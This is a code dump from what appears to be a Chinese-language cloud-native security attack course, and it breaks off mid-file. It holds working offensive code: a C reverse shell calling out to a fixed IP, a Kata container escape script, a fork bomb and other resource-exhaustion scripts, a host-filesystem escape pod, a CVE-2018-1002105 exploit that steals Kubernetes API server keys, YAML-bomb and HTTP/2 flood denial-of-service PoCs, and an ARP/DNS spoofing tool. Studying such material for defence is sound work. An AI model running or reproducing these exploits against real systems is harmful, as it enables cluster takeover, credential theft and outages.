stopTracingCalled = true
return emptyResp, nil
}
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/mount.go
================================================
//
// Copyright (c) 2017-2019 Intel Corporation
//
// SPDX-License-Identifier: Apache-2.0
//
package main
import (
"bufio"
"context"
"fmt"
"os"
"path/filepath"
"regexp"
"strconv"
"strings"
"syscall"
pb "github.com/kata-containers/agent/protocols/grpc"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
"golang.org/x/sys/unix"
"google.golang.org/grpc/codes"
grpcStatus "google.golang.org/grpc/status"
)
const (
type9pFs = "9p"
typeVirtioFS = "virtio_fs"
typeRootfs = "rootfs"
typeTmpFs = "tmpfs"
procMountStats = "/proc/self/mountstats"
mountPerm = os.FileMode(0755)
)
var flagList = map[string]int{
"acl": unix.MS_POSIXACL,
"bind": unix.MS_BIND,
"defaults": 0,
"dirsync": unix.MS_DIRSYNC,
"iversion": unix.MS_I_VERSION,
"lazytime": unix.MS_LAZYTIME,
"mand": unix.MS_MANDLOCK,
"noatime": unix.MS_NOATIME,
"nodev": unix.MS_NODEV,
"nodiratime": unix.MS_NODIRATIME,
"noexec": unix.MS_NOEXEC,
"nosuid": unix.MS_NOSUID,
"rbind": unix.MS_BIND | unix.MS_REC,
"relatime": unix.MS_RELATIME,
"remount": unix.MS_REMOUNT,
"ro": unix.MS_RDONLY,
"silent": unix.MS_SILENT,
"strictatime": unix.MS_STRICTATIME,
"sync": unix.MS_SYNCHRONOUS,
"private": unix.MS_PRIVATE,
"shared": unix.MS_SHARED,
"slave": unix.MS_SLAVE,
"unbindable": unix.MS_UNBINDABLE,
"rprivate": unix.MS_PRIVATE | unix.MS_REC,
"rshared": unix.MS_SHARED | unix.MS_REC,
"rslave": unix.MS_SLAVE | unix.MS_REC,
"runbindable": unix.MS_UNBINDABLE | unix.MS_REC,
}
func createDestinationDir(dest string) error {
targetPath, _ := filepath.Split(dest)
return os.MkdirAll(targetPath, mountPerm)
}
// mount mounts a source in to a destination. This will do some bookkeeping:
// * evaluate all symlinks
// * ensure the source exists
func mount(source, destination, fsType string, flags int, options string) error {
var absSource string
// Log before validation. This is useful to debug cases where the gRPC
// protocol version being used by the client is out-of-sync with the
// agents version. gRPC message members are strictly ordered, so it's
// quite possible that if the protocol changes, the client may
// try to pass a valid mountpoint, but the gRPC layer may change that
// through the member ordering to be a mount *option* for example.
agentLog.WithFields(logrus.Fields{
"mount-source": source,
"mount-destination": destination,
"mount-fstype": fsType,
"mount-flags": flags,
"mount-options": options,
}).Debug()
if source == "" {
return fmt.Errorf("need mount source")
}
if destination == "" {
return fmt.Errorf("need mount destination")
}
if fsType == "" {
return fmt.Errorf("need mount FS type")
}
var err error
switch fsType {
case type9pFs, typeVirtioFS:
if err = createDestinationDir(destination); err != nil {
return err
}
absSource = source
case typeTmpFs:
absSource = source
default:
absSource, err = filepath.EvalSymlinks(source)
if err != nil {
return grpcStatus.Errorf(codes.Internal, "Could not resolve symlink for source %v", source)
}
if err = ensureDestinationExists(absSource, destination, fsType); err != nil {
return grpcStatus.Errorf(codes.Internal, "Could not create destination mount point: %v: %v",
destination, err)
}
}
if err = syscall.Mount(absSource, destination,
fsType, uintptr(flags), options); err != nil {
return grpcStatus.Errorf(codes.Internal, "Could not mount %v to %v: %v",
absSource, destination, err)
}
return nil
}
// ensureDestinationExists will recursively create a given mountpoint. If directories
// are created, their permissions are initialized to mountPerm
func ensureDestinationExists(source, destination string, fsType string) error {
fileInfo, err := os.Stat(source)
if err != nil {
return grpcStatus.Errorf(codes.Internal, "could not stat source location: %v",
source)
}
if err := createDestinationDir(destination); err != nil {
return grpcStatus.Errorf(codes.Internal, "could not create parent directory: %v",
destination)
}
if fsType != "bind" || fileInfo.IsDir() {
if err := os.Mkdir(destination, mountPerm); !os.IsExist(err) {
return err
}
} else {
file, err := os.OpenFile(destination, os.O_CREATE, mountPerm)
if err != nil {
return err
}
file.Close()
}
return nil
}
func parseMountFlagsAndOptions(optionList []string) (int, string) {
var (
flags int
options []string
)
for _, opt := range optionList {
flag, ok := flagList[opt]
if ok {
flags |= flag
continue
}
options = append(options, opt)
}
return flags, strings.Join(options, ",")
}
func parseOptions(optionList []string) map[string]string {
options := make(map[string]string)
for _, opt := range optionList {
idx := strings.Index(opt, "=")
if idx < 1 {
continue
}
key, val := opt[:idx], opt[idx+1:]
options[key] = val
}
return options
}
func removeMounts(mounts []string) error {
for _, mount := range mounts {
if err := syscall.Unmount(mount, 0); err != nil {
return err
}
}
return nil
}
// storageHandler is the type of callback to be defined to handle every
// type of storage driver.
type storageHandler func(ctx context.Context, storage pb.Storage, s *sandbox) (string, error)
// storageHandlerList lists the supported drivers.
var storageHandlerList = map[string]storageHandler{
driver9pType: virtio9pStorageHandler,
driverVirtioFSType: virtioFSStorageHandler,
driverBlkType: virtioBlkStorageHandler,
driverBlkCCWType: virtioBlkCCWStorageHandler,
driverMmioBlkType: virtioMmioBlkStorageHandler,
driverSCSIType: virtioSCSIStorageHandler,
driverEphemeralType: ephemeralStorageHandler,
driverLocalType: localStorageHandler,
}
func ephemeralStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
s.Lock()
defer s.Unlock()
newStorage := s.setSandboxStorage(storage.MountPoint)
if newStorage {
var err error
if err = os.MkdirAll(storage.MountPoint, os.ModePerm); err == nil {
_, err = commonStorageHandler(storage)
}
return "", err
}
return "", nil
}
func localStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
s.Lock()
defer s.Unlock()
newStorage := s.setSandboxStorage(storage.MountPoint)
if newStorage {
// Extract and parse the mode out of the storage options.
// Default to os.ModePerm.
opts := parseOptions(storage.Options)
mode := os.ModePerm
if val, ok := opts["mode"]; ok {
m, err := strconv.ParseUint(val, 8, 32)
if err != nil {
return "", err
}
mode = os.FileMode(m)
}
if err := os.MkdirAll(storage.MountPoint, mode); err != nil {
return "", err
}
// We chmod the permissions for the mount point, as we can't rely on os.MkdirAll to set the
// desired permissions.
return "", os.Chmod(storage.MountPoint, mode)
}
return "", nil
}
// virtio9pStorageHandler handles the storage for 9p driver.
func virtio9pStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
return commonStorageHandler(storage)
}
// virtioMmioBlkStorageHandler handles the storage for mmio blk driver.
func virtioMmioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
//The source path is VmPath
return commonStorageHandler(storage)
}
// virtioBlkCCWStorageHandler handles the storage for blk ccw driver.
func virtioBlkCCWStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) {
devPath, err := getBlkCCWDevPath(s, storage.Source)
if err != nil {
return "", err
}
if devPath == "" {
return "", grpcStatus.Errorf(codes.InvalidArgument,
"Storage source is empty")
}
storage.Source = devPath
return commonStorageHandler(storage)
}
// virtioFSStorageHandler handles the storage for virtio-fs.
func virtioFSStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
return commonStorageHandler(storage)
}
// virtioBlkStorageHandler handles the storage for blk driver.
func virtioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) {
// If hot-plugged, get the device node path based on the PCI address else
// use the virt path provided in Storage Source
if strings.HasPrefix(storage.Source, "/dev") {
FileInfo, err := os.Stat(storage.Source)
if err != nil {
return "", err
}
// Make sure the virt path is valid
if FileInfo.Mode()&os.ModeDevice == 0 {
return "", fmt.Errorf("invalid device %s", storage.Source)
}
} else {
devPath, err := getPCIDeviceName(s, storage.Source)
if err != nil {
return "", err
}
storage.Source = devPath
}
return commonStorageHandler(storage)
}
// virtioSCSIStorageHandler handles the storage for scsi driver.
func virtioSCSIStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) {
// Retrieve the device path from SCSI address.
devPath, err := getSCSIDevPath(s, storage.Source)
if err != nil {
return "", err
}
storage.Source = devPath
return commonStorageHandler(storage)
}
func commonStorageHandler(storage pb.Storage) (string, error) {
// Mount the storage device.
if err := mountStorage(storage); err != nil {
return "", err
}
return storage.MountPoint, nil
}
// mountStorage performs the mount described by the storage structure.
func mountStorage(storage pb.Storage) error {
flags, options := parseMountFlagsAndOptions(storage.Options)
return mount(storage.Source, storage.MountPoint, storage.Fstype, flags, options)
}
// addStorages takes a list of storages passed by the caller, and perform the
// associated operations such as waiting for the device to show up, and mount
// it to a specific location, according to the type of handler chosen, and for
// each storage.
func addStorages(ctx context.Context, storages []*pb.Storage, s *sandbox) (mounts []string, err error) {
span, ctx := trace(ctx, "mount", "addStorages")
span.setTag("sandbox", s.id)
defer span.finish()
var mountList []string
var storageList []string
defer func() {
if err != nil {
s.Lock()
for _, path := range storageList {
if err := s.unsetAndRemoveSandboxStorage(path); err != nil {
agentLog.WithFields(logrus.Fields{
"error": err,
"path": path,
}).Error("failed to roll back addStorages")
}
}
s.Unlock()
}
}()
for _, storage := range storages {
if storage == nil {
continue
}
devHandler, ok := storageHandlerList[storage.Driver]
if !ok {
return nil, grpcStatus.Errorf(codes.InvalidArgument,
"Unknown storage driver %q", storage.Driver)
}
// Wrap the span around the handler call to avoid modifying
// the handler interface but also to avoid having to add trace
// code to each driver.
handlerSpan, _ := trace(ctx, "mount", storage.Driver)
mountPoint, err := devHandler(ctx, *storage, s)
handlerSpan.finish()
if _, ok := s.storages[storage.MountPoint]; ok {
storageList = append([]string{storage.MountPoint}, storageList...)
}
if err != nil {
return nil, err
}
if mountPoint != "" {
// Prepend mount point to mount list.
mountList = append([]string{mountPoint}, mountList...)
}
}
return mountList, nil
}
// getMountFSType returns the FS type corresponding to the passed mount point and
// any error ecountered.
func getMountFSType(mountPoint string) (string, error) {
if mountPoint == "" {
return "", errors.Errorf("Invalid mount point '%s'", mountPoint)
}
mountstats, err := os.Open(procMountStats)
if err != nil {
return "", errors.Wrapf(err, "Failed to open file '%s'", procMountStats)
}
defer mountstats.Close()
// Refer to fs/proc_namespace.c:show_vfsstat() for
// the file format.
re := regexp.MustCompile(fmt.Sprintf(`device .+ mounted on %s with fstype (.+)`, mountPoint))
scanner := bufio.NewScanner(mountstats)
for scanner.Scan() {
line := scanner.Text()
matches := re.FindStringSubmatch(line)
if len(matches) > 1 {
return matches[1], nil
}
}
if err := scanner.Err(); err != nil {
return "", errors.Wrapf(err, "Failed to parse proc mount stats file %s", procMountStats)
}
return "", errors.Errorf("Failed to find FS type for mount point '%s'", mountPoint)
}
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_bin.c
================================================
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include
#include
#include
#include
#include
#define REMOTE_ADDR "172.16.56.1"
#define REMOTE_PORT 10000
int main(int argc, char *argv[])
{
struct sockaddr_in sa;
int s;
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);
sa.sin_port = htons(REMOTE_PORT);
s = socket(AF_INET, SOCK_STREAM, 0);
connect(s, (struct sockaddr *)&sa, sizeof(sa));
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
execve("/bin/bash", 0, 0);
return 0;
}
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/exploit.sh
================================================
#!/bin/bash
set -e
# warm up
echo "[*] Running an Ubuntu container to warm up..."
docker run --rm ubuntu uname -a
echo "[*] Exploiting to escape kata..."
echo "[*] Running malicious container with kata on CLH..."
docker run --rm --name stage1 kata-malware-image:latest
echo "[+] Guest image file has been compromised"
echo "[*] Running malicious container with kata on CLH once again..."
docker run --rm -d --name stage2 kata-malware-image:latest
echo "[+] Done. Now you can wait for the reverse shell :)"
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/get_kata_src.sh
================================================
#!/bin/bash
mkdir -p $GOPATH/src/github.com/kata-containers/
cd $GOPATH/src/github.com/kata-containers/
git clone https://github.com/kata-containers/agent
cd agent
git checkout 1.10.0
================================================
FILE: code/0304-运行时攻击/02-安全容器逃逸/install_kata.sh
================================================
#!/bin/bash
set -e -x
# 下载安装包(如果已经下载,此步可跳过)
#wget https://github.com/kata-containers/runtime/releases/download/1.10.0/kata-static-1.10.0-x86_64.tar.xz
tar xf kata-static-1.10.0-x86_64.tar.xz
rm -rf /opt/kata
mv ./opt/kata /opt
rmdir ./opt
rm -rf /etc/kata-containers
cp -r /opt/kata/share/defaults/kata-containers /etc/
# 使用Cloud Hypervisor作为虚拟机管理程序
rm /etc/kata-containers/configuration.toml
ln -s /etc/kata-containers/configuration-clh.toml /etc/kata-containers/configuration.toml
# 配置Docker
mkdir -p /etc/docker/
cat << EOF > /etc/docker/daemon.json
{
"runtimes": {
"kata-runtime": {
"path": "/opt/kata/bin/kata-runtime"
},
"kata-clh": {
"path": "/opt/kata/bin/kata-clh"
},
"kata-qemu": {
"path": "/opt/kata/bin/kata-qemu"
}
},
"registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"]
}
EOF
mkdir -p /etc/systemd/system/docker.service.d/
cat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf
[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime
EOF
# 重载配置&重新启动Docker
systemctl daemon-reload && systemctl restart docker
================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_cpu.sh
================================================
#!/bin/bash
# for Debian & Ubuntu
# apt install -y stress
stress -c 1000
================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_disk.sh
================================================
#!/bin/bash
# for Debian & Ubuntu
# apt install -y util-linux
fallocate -l 9.4G ./bomb
================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_mem.sh
================================================
#!/bin/bash
# for Debian & Ubuntu
# apt install -y stress
stress --vm-bytes 3300m --vm-keep -m 3
================================================
FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_pid.sh
================================================
#!/bin/bash
:() { :|:& };:
================================================
FILE: code/0402-Kubernetes组件不安全配置/deploy_escape_pod_on_remote_host.sh
================================================
#!/bin/bash
cat << EOF > escape.yaml
# attacker.yaml
apiVersion: v1
kind: Pod
metadata:
name: attacker
spec:
containers:
- name: ubuntu
image: ubuntu:latest
imagePullPolicy: IfNotPresent
# Just spin & wait forever
command: [ "/bin/bash", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumeMounts:
- name: escape-host
mountPath: /host-escape-door
volumes:
- name: escape-host
hostPath:
path: /
EOF
kubectl -s TARGET-IP:8080 apply -f escape.yaml
sleep 8
kubectl -s TARGET-IP:8080 exec -it attacker /bin/bash
================================================
FILE: code/0403-CVE-2018-1002105/attacker.yaml
================================================
# attacker.yaml
apiVersion: v1
kind: Pod
metadata:
name: attacker
spec:
containers:
- name: ubuntu
image: ubuntu:latest
imagePullPolicy: IfNotPresent
# Just spin & wait forever
command: [ "/bin/bash", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumeMounts:
- name: escape-host
mountPath: /host-escape-door
volumes:
- name: escape-host
hostPath:
path: /
================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_namespace.yaml
================================================
# cve_2018_1002105_namespace.yaml
apiVersion: v1
kind: Namespace
metadata:
name: test
================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_pod.yaml
================================================
# cve_2018_1002105_pod.yaml
apiVersion: v1
kind: Pod
metadata:
name: test
namespace: test
spec:
containers:
- name: ubuntu
image: ubuntu:latest
imagePullPolicy: IfNotPresent
# Just spin & wait forever
command: [ "/bin/bash", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
serviceAccount: default
serviceAccountName: default
================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_role.yaml
================================================
# cve_2018_1002105_role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: test
namespace: test
rules:
- apiGroups:
- ""
resources:
- pods
verbs:
- get
- list
- delete
- watch
- apiGroups:
- ""
resources:
- pods/exec
verbs:
- create
- get
================================================
FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_role_binding.yaml
================================================
# cve_2018_1002105_role_binding.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: test
namespace: test
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: test
subjects:
- apiGroup: rbac.authorization.k8s.io
kind: Group
name: test
================================================
FILE: code/0403-CVE-2018-1002105/exploit.py
================================================
"""ExP for CVE-2018-1002105
ONLY USED FOR SECURITY RESEARCH
ILLEGAL USE IS **PROHIBITED**
"""
from secrets import base64, token_bytes
import sys
import argparse
import socket
import ssl
from urllib import parse
import json
try:
from http_parser.parser import HttpParser
except ImportError:
from http_parser.pyparser import HttpParser
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
# Args
parser = argparse.ArgumentParser(description='ExP for CVE-2018-1002105.')
required = parser.add_argument_group('required arguments')
required.add_argument('--target', '-t', dest='host', type=str,
help='API Server\'s IP', required=True)
required.add_argument('--port', '-p', dest='port', type=str,
help='API Server\'s port', required=True)
required.add_argument('--bearer-token', '-b', dest='token', type=str,
help='Bearer token for the low privileged user', required=True)
required.add_argument('--namespace', '-n', dest='namespace', type=str,
help='Namespace with method access',
default='default', required=True)
required.add_argument('--pod', '-P', dest='pod', type=str,
required=True, help='Pod with method access')
args = parser.parse_args()
# HTTP Gadgets
http_delimiter = '\r\n'
host_header = f'Host: {args.host}:{args.port}'
auth_header = f'Authorization: Bearer {args.token}'
conn_header = 'Connection: upgrade'
upgrade_header = 'Upgrade: websocket'
agent_header = 'User-Agent: curl/7.64.1'
accept_header = 'Accept: */*'
origin_header = f'Origin: http://{args.host}:{args.port}'
sec_key = base64.b64encode(token_bytes(20)).decode('utf-8')
sec_websocket_key = f'Sec-WebSocket-Key: {sec_key}'
sec_websocket_version = 'Sec-WebSocket-Version: 13'
# secret targets
ca_crt = 'ca.crt'
client_crt = 'apiserver-kubelet-client.crt'
client_key = 'apiserver-kubelet-client.key'
def _get_http_body(byte_http):
p = HttpParser()
recved = len(byte_http)
p.execute(byte_http, recved)
return p.recv_body().decode('utf-8')
def _recv_all_once(ssock, length=4096):
res = b""
incoming = True
while incoming:
try:
res += ssock.recv(length)
except socket.timeout:
if not res:
continue
else:
break
return res
def _try_to_get_privilege(ssock, namespace, pod):
payload1 = http_delimiter.join(
(f'GET /api/v1/namespaces/{namespace}/pods/{pod}/exec HTTP/1.1',
host_header,
auth_header,
upgrade_header,
conn_header))
payload1 += http_delimiter * 2
ssock.send(payload1.encode('utf-8'))
def _run_with_privilege(ssock, get_path):
payload = http_delimiter.join(
(f'GET {get_path} HTTP/1.1',
host_header,
auth_header,
conn_header,
upgrade_header,
origin_header,
sec_websocket_key,
sec_websocket_version))
payload += http_delimiter * 2
ssock.send(payload.encode('utf-8'))
def _match_or_exit(banner_bytes, resp, fail_message="[-] Failed."):
if banner_bytes in resp:
return
print(fail_message)
sys.exit(1)
def _get_secret(resp):
delimiter = b'-----'
start = resp.index(delimiter)
end = resp.rindex(delimiter)
return resp[start:end + len(delimiter)].decode('utf-8')
def _save_file(file_name, content):
with open(file_name, 'w') as f:
f.write(content)
def _steal_secret(api_server, secret_file, match_banner):
with socket.create_connection((args.host, int(args.port))) as sock:
with context.wrap_socket(sock, server_hostname=args.host) as ssock:
ssock.settimeout(1)
print('[*] Creating new privileged pipe...')
_try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod)
resp = _recv_all_once(ssock)
_match_or_exit(b'stdin, stdout, stderr', resp)
print(f"[*] Trying to steal {secret_file}...")
cmd1 = parse.quote('/bin/cat')
cmd2 = parse.quote(f"/etc/kubernetes/pki/{secret_file}")
_run_with_privilege(
ssock,
f'/exec/kube-system/{api_server}/kube-apiserver?command={cmd1}&command={cmd2}&input=1&output=1&tty=0')
resp = _recv_all_once(ssock)
_match_or_exit(b'HTTP/1.1 101 Switching Protocols', resp)
_match_or_exit(match_banner, resp, fail_message=f'[-] Cannot find banner {match_banner}.')
print(f'[+] Got {secret_file}.')
secret_content = _get_secret(resp)
_save_file(secret_file, secret_content)
print(f'[+] Secret {secret_file} saved :)')
def main():
print("[*] Exploiting CVE-2018-1002105...")
with socket.create_connection((args.host, int(args.port))) as sock:
with context.wrap_socket(sock, server_hostname=args.host) as ssock:
# step 1
ssock.settimeout(1)
print("[*] Checking vulnerable or not...")
_try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod)
resp = _recv_all_once(ssock)
_match_or_exit(
b'stdin, stdout, stderr',
resp,
fail_message='[-] Not vulnerable to CVE-2018-1002105.')
print("[+] Vulnerable to CVE-2018-1002105, continue.")
# step 2
print("[*] Getting running pods list...")
_run_with_privilege(ssock, '/runningpods/')
resp = _recv_all_once(ssock)
_match_or_exit(b'HTTP/1.1 200 OK', resp)
print("[+] Got running pods list.")
pods_info = json.loads(_get_http_body(resp))
pods_list = [pod['metadata']['name'] for pod in pods_info['items']]
for pod in pods_list:
if pod.startswith('kube-apiserver'):
api_server = pod
break
else:
print("[-] Cannot find API Server.")
sys.exit(1)
print(f"[*] API Server is {api_server}.")
# step 3
_steal_secret(
api_server=api_server,
secret_file=ca_crt,
match_banner=b'BEGIN CERTIFICATE')
_steal_secret(
api_server=api_server,
secret_file=client_crt,
match_banner=b'BEGIN CERTIFICATE')
_steal_secret(
api_server=api_server,
secret_file=client_key,
match_banner=b'BEGIN RSA PRIVATE KEY')
print('[+] Enjoy your trip :)')
cmd_try = f"kubectl --server=https://{args.host}:{args.port}" \
f" --certificate-authority={ca_crt}" \
f" --client-certificate={client_crt}" \
f" --client-key={client_key} get pods -n kube-system"
print(cmd_try)
if __name__ == "__main__":
main()
================================================
FILE: code/0403-CVE-2018-1002105/test-token.csv
================================================
password,test,test,test
================================================
FILE: code/0404-K8s拒绝服务攻击/CVE-2019-11253-poc.sh
================================================
#!/bin/bash
# 查看Kubernetes版本
kubectl version | grep Server
# 开启通向API Server的代理
kubectl proxy &
# 创建一个恶意ConfigMap文件(n=9)
cat << EOF > cve-2019-11253.yaml
apiVersion: v1
data:
a: &a ["web","web","web","web","web","web","web","web","web"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
name: yaml-bomb
namespace: default
EOF
# 向API Server发出ConfigMap创建请求
curl -X POST http://127.0.0.1:8001/api/v1/namespaces/default/configmaps -H "Content-Type: application/yaml" --data-binary @cve-2019-11253.yaml
================================================
FILE: code/0404-K8s拒绝服务攻击/CVE-2019-9512-poc.py
================================================
#!/usr/bin/python
# cve-2019-9512.py
import ssl
import socket
import time
import sys
class PingFlood:
# HTTP/2 Magic头
PREAMBLE = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'
# PING帧
PING_FRAME = b"\x00\x00\x08" \
b"\x06" \
b"\x00" \
b"\x00\x00\x00\x00" \
b"\x00\x01\x02\x03\x04\x05\x06\x07"
# WINDOW UPDATE帧
WINDOW_UPDATE_FRAME = b"\x00\x00\x04\x08\x00\x00\x00\x00\x00\x3f\xff\x00\x01"
# SETTINGS帧
SETTINGS_FRAME = b"\x00\x00\x12\x04\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x64\x00" \
b"\x04\x40\x00\x00\x00\x00\x02\x00\x00\x00\x00"
# SETTINGS响应帧
SETTINGS_ACK_FRAME = b"\x00\x00\x00\x04\x01\x00\x00\x00\x00"
# HEADERS帧,请求/healthz
HEADERS_FRAME_healthz = b"\x00\x00\x29\x01\x05\x00\x00\x00\x01\x82\x04\x86\x62\x72\x8e\x84" \
b"\xcf\xef\x87\x41\x8e\x0b\xe2\x5c\x2e\x3c\xb8\x5f\x5c\x4d\x8a\xe3" \
b"\x8d\x34\xcf\x7a\x88\x25\xb6\x50\xc3\xab\xb8\xd2\xe1\x53\x03\x2a" \
b"\x2f\x2a"
def __init__(self, ip, port=6443, socket_count=1000):
# 配置到Kubernetes API Server的TLS上下文
self._context = ssl.SSLContext(ssl.PROTOCOL_TLS)
self._context.check_hostname = False
self._context.load_cert_chain(certfile="./client_cert", keyfile="./client_key_data")
self._context.load_verify_locations("./certificate_authority_data")
self._context.verify_mode = ssl.CERT_REQUIRED
# self._context.keylog_filename = "/Users/rambo/Desktop/exp/keylog"
# 协议协商
self._context.set_alpn_protocols(['h2', 'http/1.1'])
self._ip = ip
self._port = port
# 创建n个socket
self._sockets = [self.create_socket() for _ in range(socket_count)]
def create_socket(self):
try:
print("[*] Creating socket...")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
# 应用配置的TLS上下文
ssock = self._context.wrap_socket(sock, server_side=False)
ssock.connect((self._ip, self._port))
# 首先发起正常的对/healthz接口的查询请求
ssock.send(self.PREAMBLE)
ssock.send(self.SETTINGS_FRAME)
ssock.send(self.HEADERS_FRAME_healthz)
ssock.send(self.SETTINGS_ACK_FRAME)
# 接收响应和回复
rmsg = ssock.recv(1024)
rmsg = ssock.recv(1024)
rmsg = ssock.recv(1024)
rmsg = ssock.recv(1024)
rmsg = ssock.recv(4096)
# 返回一个待用于攻击的socket
return ssock
except socket.error as se:
print("[-] Error: " + str(se))
# 创建socket失败,则等待一会儿再次尝试创建
time.sleep(0.5)
return self.create_socket()
def attack(self):
print("[*] Flooding...")
for s in self._sockets:
try:
# 发送PING帧,不读取响应帧
s.send(self.PING_FRAME)
except socket.error:
self._sockets.remove(s)
self._sockets.append(self.create_socket())
if __name__ == "__main__":
dos = PingFlood(sys.argv[1], int(sys.argv[2]), int(sys.argv[3]))
dos.attack()
================================================
FILE: code/0405-云原生网络攻击/Dockerfile
================================================
FROM ubuntu:latest
COPY k8s_dns_mitm.py /poc.py
RUN sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.list
RUN apt update && DEBIAN_FRONTEND=noninteractive apt install -y python3 python3-pip && apt clean
RUN pip3 install scapy -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn
RUN chmod u+x /poc.py
ENTRYPOINT ["/bin/bash", "-c", "/poc.py example.com "]
================================================
FILE: code/0405-云原生网络攻击/attacker.yaml
================================================
# attacker_pod
apiVersion: v1
kind: Pod
metadata:
name: attacker
spec:
containers:
- name: main
image: k8s_dns_mitm:1.0
imagePullPolicy: IfNotPresent
================================================
FILE: code/0405-云原生网络攻击/build_image.sh
================================================
#!/bin/bash
docker build -t k8s_dns_mitm:1.0 .
================================================
FILE: code/0405-云原生网络攻击/cleanup.sh
================================================
#!/bin/bash
set -e -x
kubectl delete pod victim attacker
for record in $(arp | grep cni0 | awk '{print $1}'); do
arp -d "$record"
done
================================================
FILE: code/0405-云原生网络攻击/exploit.sh
================================================
#!/bin/bash
set -e
echo "[*] Pulling curl image..."
docker pull curlimages/curl:latest
echo "[*] Creating attacker and victim pods..."
kubectl apply -f attacker.yaml
kubectl apply -f victim.yaml
echo "[*] Waiting 20s for pods' creation..."
sleep 20
echo "[*] Reading attacker's log..."
kubectl logs attacker
echo "[*] Trying to curl http://example.com in victim..."
kubectl exec -it victim curl http://example.com
================================================
FILE: code/0405-云原生网络攻击/k8s_dns_mitm.py
================================================
#!/usr/bin/python3
# issues about scapy with Pycharm:
# https://stackoverflow.com/questions/45691654/unresolved-reference-with-scapy
import sys
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
from multiprocessing import Process
from scapy.layers.inet import IP, UDP, Ether, ICMP
from scapy.layers.l2 import ARP
from scapy.sendrecv import srp1, srp, send, sendp, sniff, sr1
from scapy.layers.dns import DNS, DNSQR, DNSRR
class S(BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_response()
self.wfile.write("F4ke Website\n".encode('utf-8'))
class DnsProxy:
""" Handles DNS request packets, will forward them to real kube-dns, except for targeted domains. """
def __init__(self, upstream_server, local_server_mac, local_server_ip,
self_mac, self_ip, fake_domain, interface):
self.upstream_server = upstream_server
self.local_server_mac = local_server_mac
self.local_server_ip = local_server_ip
self.mac = self_mac
self.ip = self_ip
self.fake_domain = fake_domain
self.interface = interface
@staticmethod
def generate_response(request, ip=None, nx=None):
return DNS(id=request[DNS].id,
aa=1, # authoritative
qr=1, # a response
rd=request[DNS].rd, # copy recursion
qdcount=request[DNS].qdcount, # copy question count
qd=request[DNS].qd, # copy question itself
ancount=1 if not nx else 0, # we provide a single answer
an=DNSRR(
rrname=request[DNS].qd.qname,
type='A',
ttl=1,
rdata=ip) if not nx else None,
rcode=0 if not nx else 3
)
@staticmethod
def is_local_domain(domain):
for tld in (".local.", ".internal."):
if domain.decode('ascii').endswith(tld):
return True
def forward(self, req_pkt, verbose):
# first contacting local dns server
req_domain = req_pkt[DNSQR].qname
def parse_responses(p): return ', '.join(
[str(p[DNSRR][x].rdata) for x in range(p[DNS].ancount)])
# if local, get response from kube-dns
if self.is_local_domain(req_domain):
answer = sr1(IP(dst=self.local_server_ip) / UDP() / DNS(rd=0,
id=req_pkt[DNS].id,
qd=DNSQR(qname=req_domain)),
verbose=verbose,
timeout=1)
resp_pkt = Ether(
src=self.local_server_mac) / IP(
dst=req_pkt[IP].src,
